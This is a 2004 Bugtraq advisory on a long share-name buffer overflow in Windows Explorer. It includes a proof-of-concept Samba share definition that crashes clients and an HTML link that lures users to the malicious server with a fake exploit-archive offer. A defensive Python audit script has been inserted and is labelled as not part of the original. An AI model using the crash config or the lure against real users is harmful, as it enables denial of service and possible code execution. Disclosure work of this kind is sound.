[34678] in bugtraq
Microsoft's Explorer and Internet Explorer long share name buffer overflow.
daemon@ATHENA.MIT.EDU (Rodrigo Gutierrez)
Mon Apr 26 21:04:39 2004
From: "Rodrigo Gutierrez" <rodrigo@intellicomp.cl>
To: <full-disclosure@lists.netsys.com>, <bugtraq@securityfocus.com>,
<submissions@packetstormsecurity.org>, <info@securiteam.com>
Date: Sun, 25 Apr 2004 18:01:53 -0400
Message-Id: <20040425215552.8A1D0403F@etrn.gtdinternet.com>
Fixed Advisory.
Rodrigo Gutierrez.
Attachment: explorer-vuln.txt
Microsoft Explorer and Internet Explorer Long Share Name Buffer Overflow.
Author: Rodrigo Gutierrez <rodrigo@intellicomp.cl>
Affected: MS Internet Explorer, MS Explorer (explorer.exe)
Windows XP (All), Windows 2000 (All), Windows 98 (All), Windows Me (All)
Not Tested: Windows 2003
Vendor Status: I notified the vendor at the beginning of 2002. This
vulnerability was supposed to be fixed in Service Pack 1 on XP and
SP4 on Windows 2000 according to the vendor's knowledge base
article 322857.
Vendor URL: http://support.microsoft.com/default.aspx?scid=kb;en-us;322857
Background.
MS Explorer (explorer.exe) and MS Internet Explorer (IEXPLORE.EXE) are
core pieces of Microsoft Windows operating systems.
Description
Windows fails to handle long share names when accessing a remote
file server such as Samba, allowing a malicious server to crash the
client's Explorer and potentially execute arbitrary code on the
machine as the current user (usually with Administrator rights on
Windows machines).
Analysis
To exploit this, an attacker must get a user to connect to a
malicious server that contains a share name 300 characters long or
longer.
Test Scenario
Windows won't allow you to create such a long share, but of course Samba
includes the feature ;). After your Samba box is up and running, create a
share in your smb.conf:
#------------ CUT HERE -------------
[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
comment = Area 51
path = /tmp/testfolder
public = yes
writable = yes
printable = no
browseable = yes
write list = @trymywingchung
#------------ CUT HERE -------------
After your server is up, just go to your Windows test box and go to the
Start menu > Run > \\your.malicious.server.ip., plufff, Explorer will
crash :).
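Server-side check, added here and not part of the original advisory: a small Python audit of an smb.conf that flags share names long enough to trigger the client crash described above, so a Samba administrator can confirm no share on their server will crash Windows clients. The 80-character threshold is an assumption (the limit Windows applies to its own share names); the sample config is constructed, and the backslash line continuation handled is the one smb.conf(5) documents.

```python
"""Audit a Samba smb.conf for share names long enough to crash the
Explorer client (added example; not the advisory's own code)."""
import re

# Assumption: Windows itself refuses share names over 80 characters, so
# anything longer is suspect; the advisory's crash needs 300 or more.
WINDOWS_SHARE_NAME_LIMIT = 80
CRASH_LENGTH = 300

SECTION_RE = re.compile(r"^\s*\[(.*)\]\s*$")
SPECIAL_SECTIONS = {"global", "homes", "printers"}  # not real shares


def share_names(smb_conf: str) -> list:
    """Return share section names in file order, skipping '#'/';' comment
    lines and joining lines that end in a backslash (smb.conf continuation)."""
    names = []
    logical = ""
    for raw in smb_conf.splitlines():
        line = raw.rstrip()
        if line.endswith("\\"):          # continued on the next line
            logical += line[:-1]
            continue
        logical += line
        stripped = logical.strip()
        logical = ""
        if not stripped or stripped[0] in "#;":
            continue
        m = SECTION_RE.match(stripped)
        if m and m.group(1).strip().lower() not in SPECIAL_SECTIONS:
            names.append(m.group(1).strip())
    return names


def oversized_shares(smb_conf: str, limit: int = WINDOWS_SHARE_NAME_LIMIT) -> list:
    """(name, length, reaches_crash_length) for every share name over `limit`."""
    return [(n, len(n), len(n) >= CRASH_LENGTH)
            for n in share_names(smb_conf) if len(n) > limit]


# Constructed sample: one sane share and one 300-character share name that
# has been split across two lines with a trailing backslash.
SAMPLE_CONF = (
    "[global]\n   workgroup = LAB\n"
    "[public]\n   path = /srv/public\n"
    "[" + "A" * 150 + "\\\n" + "A" * 150 + "]\n   path = /tmp/testfolder\n"
)

if __name__ == "__main__":
    for name, length, crashes in oversized_shares(SAMPLE_CONF):
        print(f"{name[:16]}... length={length} reaches_crash_length={crashes}")
```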
Social Engineering:
<a href="\\my.malicious.server.ip">Enter My 0day sploit archive l/p:n0ph33r</a>
Workaround.
From your network card settings, disable the Client for Microsoft
Networks until a real fix for this vulnerability is available.